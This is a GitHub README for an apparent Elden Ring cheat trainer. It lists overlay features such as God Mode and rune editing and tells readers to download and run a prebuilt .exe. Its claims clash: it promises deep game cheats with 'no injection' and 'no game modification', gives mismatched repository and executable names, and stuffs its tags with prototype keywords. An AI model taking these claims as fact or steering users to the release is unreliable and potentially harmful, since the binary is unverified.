Skip to content

Rendi-18/EldenRing-Player-Inventory-Editor

Folders and files

NameName
Last commit message
Last commit date

Latest commit

ย 

History

14 Commits
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 

Repository files navigation

Elden Ring Player and Inventory Editor

๐Ÿ“ฅ Download & Discuss

DOWNLOAD v1.0
ALL RELEASES
MIT License โ€ข Open Source

Updated: March 17, 2026

image image

(Dark ImGui UI โ€ข Standalone overlay โ€ข No injection โ€ข INSERT to toggle)

Powerful standalone external editor interface for Elden Ring + Shadow of the Erdtree

Edit player stats, inventory, runes and more with a sleek overlay menu. Fully offline, no game modification.

Windows ZIP โ€ข Extract and run .exe โ€ข Always backup your save files before using any tool!

Made with โค๏ธ for the Elden Ring community โ€ข MIT License โ€ข v1.0 โ€” March 2026

Why Choose This Player and Inventory Editor in 2026?

  • Fully compatible with Elden Ring + Shadow of the Erdtree (v1.02โ€“v1.16 styles)
  • No injection โ€ข No DLL โ€ข No hooks โ€” pure external overlay interface
  • Modern dark ImGui UI โ€” resizable, always on top, collapsible sections
  • Dozens of options: God Mode, Infinite HP/FP/Stamina, Damage multipliers, Rune editing, Freeze enemies, Game speed & more
  • Hotkey support (INSERT toggle, END exit) โ€” fast access
  • Lightweight (~500 KB) โ€ข Static build โ€ข Runs on any Windows 10/11
  • Full source code available โ€” compile yourself, verify everything
  • Perfect for testing builds, challenge runs, rune experiments, cosmetics

Whether you're doing NG+7 runs, infinite rune testing, one-shot experiments, or just want quick fun with DLC mechanics โ€” this editor covers you.

Full Feature List โ€“ Player and Inventory Editor

Character Stats & Appearance

  • God Mode / Ignore Hits
  • Infinite HP
  • Infinite FP / Mana
  • Infinite Stamina
  • No Stamina Cost
  • Super Run Speed (1ร—โ€“12ร— slider)
  • Super Jump Height (1ร—โ€“20ร— slider)
  • Zero Equip Load
  • No Fall Damage
  • Infinite Item Usage

Combat Adjustments

  • One Hit Kill / Instant Kill
  • Damage ร—N (1โ€“200 slider)
  • Defense ร—N (0.1โ€“10 slider)
  • No Damage Taken
  • Infinite Poise / No Stagger
  • 100% Item Discovery

Runes & Progression

  • Add Runes (button + amount input)
  • Runes ร—N on Gain (1โ€“100 slider)
  • No Rune Loss on Death
  • Infinite Great Rune Effect
  • Always Regenerate HP/FP/Stamina

Advanced Controls

  • Freeze All Enemies / AI
  • Game Speed (0.1โ€“5.0ร— slider)
  • Easy Craft / No Materials Required
  • Unlimited Arrows & Bolts
  • Infinite Spirit Summons
  • Instant Respawn

Installation โ€“ 30 Seconds Setup

  1. Download from Releases (ZIP file)
  2. Extract to any folder
  3. Run the .exe (no installation needed)
  4. Launch Elden Ring first
  5. Press INSERT to show/hide menu
  6. Enjoy โ€” END to exit

๐Ÿ› ๏ธ Building from Source

Prerequisites

  • Windows 10/11 (64-bit)
  • Visual Studio 2022 or newer with C++ tools
  • PowerShell

Setup

  1. Clone this repository
git clone https://github.com/yourusername/elden-ring-trainer-visual.git
cd elden-ring-trainer-visual
  1. Download Dear ImGui

The build script will automatically download Dear ImGui v1.90.1. Or download manually:

https://github.com/ocornut/imgui/archive/refs/tags/v1.90.1.zip

Extract and copy these files to imgui/ folder:

  • imgui.h, imgui.cpp, imgui_draw.cpp, imgui_tables.cpp, imgui_widgets.cpp
  • imgui_internal.h, imconfig.h
  • imstb_*.h files
  • From backends/: imgui_impl_dx11.* and imgui_impl_win32.*
  1. Compile
.\CompileNow.ps1

The executable will be created at: bin\ShadowTrainerVisual.exe

๐ŸŽฎ Usage

  1. Run ShadowTrainerVisual.exe
  2. Press INSERT to show/hide the menu
  3. Click checkboxes and adjust sliders
  4. Press ESC or END to exit

Controls

Key Action
INSERT Toggle UI visibility
ESC Exit application
END Exit application

๐Ÿ“ฆ Technical Details

  • Language: C++20
  • GUI Library: Dear ImGui 1.90.1
  • Graphics API: DirectX 11
  • Compiler: MSVC (Visual Studio 2022+)
  • Runtime: Static linking (/MT)
  • Size: ~497 KB
  • Architecture: x64 only

Optimization Flags

/O2 /Oi /Ot /GL /MT /GS- /LTCG

System Dependencies

Only standard Windows DLLs (present on all Windows 10/11):

  • d3d11.dll - DirectX 11
  • dxgi.dll - DirectX Graphics Infrastructure
  • dwmapi.dll - Desktop Window Manager
  • IMM32.dll - Input Method Manager
  • D3DCOMPILER_47.dll - DirectX shader compiler

๐Ÿ“‚ Project Structure

elden-ring-trainer-visual/
โ”œโ”€โ”€ Main.cpp              # WinMain entry point, DirectX 11 setup
โ”œโ”€โ”€ UIRenderer.cpp        # ImGui interface implementation
โ”œโ”€โ”€ UIRenderer.h          # UI rendering declarations
โ”œโ”€โ”€ AppState.h            # Application state structure
โ”œโ”€โ”€ CompileNow.ps1        # Quick compilation script
โ”œโ”€โ”€ README.md             # This file
โ””โ”€โ”€ imgui/                # Dear ImGui library (download separately)
    โ”œโ”€โ”€ imgui.cpp
    โ”œโ”€โ”€ imgui_impl_dx11.cpp
    โ”œโ”€โ”€ imgui_impl_win32.cpp
    โ””โ”€โ”€ ...

Use responsibly and respect game developers' terms of service.

๐Ÿ“œ License

This project is provided as-is for educational purposes only.

Dear ImGui is licensed under the MIT License.

๐Ÿ™ Credits

๐Ÿ”— Links


Made with โค๏ธ for learning purposes only

elden-ring eldenring shadow-of-the-erdtree elden-ring-tool player-tool character-tool inventory-tool stat-editor resource-manager equipment-manager game-ui ui-prototype overlay-ui standalone-ui external-ui offline-tool game-utility rpg-tool soulslike-tool fromsoftware-game player-customizer character-customizer inventory-manager progression-tool stat-adjuster resource-adjuster equipment-customizer gameplay-prototype visual-editor demo-interface imgui-tool dear-imgui directx11 dx11-overlay windows-game-tool c++-game-ui c++20 game-interface ui-demo prototype-tool modding-prototype game-experiment offline-experiment player-experiment inventory-experiment stat-experiment resource-experiment equipment-experiment gameplay-experiment visual-prototype